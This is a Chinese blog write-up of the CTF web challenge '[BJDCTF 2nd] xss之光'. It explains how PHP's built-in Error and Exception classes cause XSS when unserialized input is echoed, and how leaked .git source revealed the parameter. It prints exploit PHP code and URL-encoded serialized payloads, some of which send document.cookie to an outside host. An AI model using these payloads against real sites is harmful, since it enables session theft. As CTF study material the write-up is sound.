[BJDCTF 2nd]xss之光

于 2021-06-19 22:51:19 发布
阅读量179 收藏
点赞数
分类专栏: CTF刷题记录 文章标签: CTF web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/116463163
版权

 考查点:利用php原生类进行xss,git文件泄露

目录

知识点

__toString()

Error

Exception

解题过程

参考链接

知识点

__toString()

当对象被当作一个字符串使用时进行默认调用,比如

$aaa = new class(); echo $aaa;     (class是一个类)

但不仅限于echo ,还有file_exist()判断也会进行触发

Error

环境:php7

Error是php的一个内置类,它有一个__toString的方法,所以可以造成xss漏洞。

测试一下:

1.php文件

<?php
$a = unserialize($_GET['c']);
echo $a;
?>

exp:

<?php
$a = new Error("<script>alert(1)</script>");
$b = serialize($a);
echo urlencode($b);
?>

exp的结果显示:

O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A19%3A%22%2Fvar%2Fwww%2Fhtml%2F1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

向1.php文件传参

?c=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A25%3A%22%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A19%3A%22%2Fvar%2Fwww%2Fhtml%2F1.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A2%3Bs%3A16%3A%22%00Exception%00trace%22%3Ba%3A0%3A%7B%7Ds%3A19%3A%22%00Exception%00previous%22%3BN%3B%7D

 成功实现alert(1)

 

Exception

环境:php5、7

使用方法类似于Error,不过是exp的Error换为Exception

解题过程

首先打开容器,是这样的

git文件泄露,在python2.7的环境下使用GitHack工具读取源码

得到源码index.php

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

但是从这个仅仅能够得到参数的名称,不知道类,所以在这里就用到前面的只是了,找一个php内置类进行操作,同时可以查看本题的环境是php5,所以使用Exception来操作。

  1. window.open是js打开新的窗口的方法
  2. window.location.href='url'可以实现恶意跳转
  3. alert(document.cookie)可以用来弹出cookie,但是本题不行。
<?php
$a = new Exception("<script>window.open('http://7f34285c-b9d4-4034-9baa-8c7581cdbb2b.node3.buuoj.cn/?'+document.cookie);</script>");
$b = serialize($a);
echo urlencode($b);


$a = new Exception("<script>window.location.href='http://7f34285c-b9d4-4034-9baa-8c7581cdbb2b.node3.buuoj.cn'+document.cookie</script>");
$b = serialize($a);
echo urlencode($b);


$a = new Exception("<script>alert(document.cookie)</script>");
$b = serialize($a);
echo urlencode($b);
?>

 得到结果

然后传参,flag就在cookie里面

参考链接

利用php的原生类进行XSS

Sk1y
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[BJDCTF 2nd]xss之光 -wp
freerats的博客
08-04 486
打开容器就gungungun,其他啥也没有。 扫目录扫出git泄露 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 源码就这么短短三行。 一开始还想着是不是其他地方还会泄露另一部分源码,但是没找到。 参考其他wp才知道是利用php的原生类进行XSS 题目给的提示就是题目叫xss,说明需要xss。 echo unserialize($a); 可触发序列化中的魔术方法__toString Error 适用于php7版本 E
前端安全之XSS攻击
02-25
有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-basedorlocalXSS(基于DOM或本地的XSS攻击)基于反射的XSS攻击,主要依靠站点服务端返回脚本,在客户端...
[BJDCTF 2nd]xss之光 (利用php原生类进行XSS
EC_Carrot的博客
12-29 518
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 知识点 有关该题目的知识点,十分建议去看看这篇大佬的文章:https://blog.csdn.net/qq_45521281/article/details/105812056 当对象被当作一个字符串使用时候调用(不仅仅是echo的时候,比如file_exists()判断也会触发):__toString 这里的原理就是利用__toString这个魔法方法
利用php的原生类进行XSS([BJDCTF 2nd]xss之光
qq_45521281的博客
04-28 1494
文章目录基础知识__toString 文章围绕着一个问题,如果在代码审计中有反序列化点,但是在原本的代码中找不到pop链该如何?N1CTF有一个无pop链的反序列化的题目,其中就是找到php内置类来进行反序列化。 基础知识 首先还是来回顾一下序列化中的魔术方法,下面也将以此进行研究。 当对象被创建的时候调用:__construct 当对象被销毁的时候调用:__destruct 当对象被当作一个字符...
Web安全性测试之XSS
01-31
XSS 全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的...
Web安全测试之XSS实例讲解
09-01
Web安全测试中的XSS(Cross Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在受害者的浏览器中注入并执行恶意脚本。攻击者通常利用这种漏洞来窃取用户的敏感信息,如Cookie,甚至操纵用户的浏览器行为,将...
web安全之XSS攻击demo
04-18
本篇将深入探讨XSS攻击的概念、类型、危害以及防范措施,并结合提供的"web安全之XSS攻击demo"进行详细讲解。 XSS攻击是通过注入恶意脚本到Web页面中,使得当其他用户浏览这些页面时,脚本被执行,从而可以盗取用户...
2020/7/20 -[BJDCTF 2nd]xss之光 - git源码泄露、php原生类反序列化
抒情诗
07-20 585
又回来了,当初看不懂,现在看起来也很nb(Exception类没了解过) 首先是个git源码泄露,开始用dirsearch扫的时候很快,但全是429,后来用了-s 延迟(单位:s)选项成功扫出.git泄露。 亲自实验-s 0.5也可以,稍微快了点。用githack下载源码,index.php 内容如下所示 <?php $a = $_GET['yds_is_so_beautiful']; echo unserialize($a); 说他是反序列化吧,我没见过这种形式的,也不太清楚;说他不是反序列化
BJDCTF 2nd WEB
A_dmin的博客
03-24 7384
BJDCTF 2nd WEB emmm,比赛做了几道题,赛后官方给了wp,把没做出来的复现一下,,,, [BJDCTF 2nd]fake google 一个SSTI,发现是jinja2的,直接用payload打就行: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='_IterationGuard' %...
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3115
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
[BJDCTF 2nd] WEB 简单题汇总
SopRomeo的博客
03-26 3076
Web简单题复现[BJDCTF 2nd]fake google在这里插入图片描述 经过测试,存在xss和模板注入,这题是模板注入 [参考文献](https://xz.aliyun.com/t/3679)[BJDCTF 2nd]old-hack[BJDCTF 2nd]duangShell[BJDCTF 2nd]简单注入方法一:方法二:方法三:[BJDCTF 2nd]Schrödinger[BJDC...
xss之htmlspecialchars
最新发布
04-10
这是一个字符串,由于其中含有Unicode编码字符"\xe4\xb9\x8b",需要先解码成中文字符"之"。整个字符串的意思是将特殊字符进行HTML实体编码,避免在网页中被误解为HTML代码而导致安全问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值